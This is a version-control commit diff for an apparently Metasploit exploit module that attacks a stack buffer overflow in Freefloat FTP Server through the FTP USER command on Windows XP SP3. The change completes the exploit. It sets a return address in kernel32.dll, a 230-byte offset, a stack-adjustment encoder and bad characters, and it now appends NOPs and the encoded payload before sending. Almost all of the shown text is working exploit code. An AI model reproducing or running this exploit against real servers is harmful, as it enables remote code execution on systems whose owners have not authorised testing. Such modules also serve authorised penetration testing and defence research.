got freefloatftp_user.rb working

2013-04-12 16:07:54 -04:00 · 2013-04-12 16:07:54 -04:00 · 6e6b98e589
parent d33d6854b8
commit 6e6b98e589
1 changed files with 7 additions and 13 deletions
--- a/modules/exploits/windows/ftp/freefloatftp_user.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_user.rb
@ -33,28 +33,22 @@ class Metasploit4 < Msf::Exploit::Remote
 			'Privileged'	 => false,
 			'Payload'		 =>
 				{
-					'Space'          => 500,
+					'Space'          => 440,
 					'DisableNops'    => true,
 					'BadChars'       => "\x00\x0a\x0d",
-					#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
-					'StackAdjustment' => -3500
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
-			'Targets'		 =>
+			'Targets'		=>
 				[
 					[ 'Windows XP SP3',
 						{
-							'Ret' => 0x7cb41020, # jmp esp 
-							#'Ret' => 0xDEADBEEF,
+							'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
 							'Offset'   => 230
 						}
 					],
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Jun 12 2012'))
-		register_options(
-			[
-				#OptAddress.new('SOURCEIP', [false, 'The local client address'])
-			], self.class)
 	end

 	def check
@ -71,9 +65,9 @@ class Metasploit4 < Msf::Exploit::Remote
 		connect
 		buf = rand_text(target['Offset'])
 		buf << [ target['Ret'] ].pack('V')
-		#buf << payload.encoded
-		raw_send("USER #{buf}\r\n")
-		#send_user(buf)
+		buf << make_nops(12)
+		buf << payload.encoded
+		send_user(buf)
 		disconnect
 	end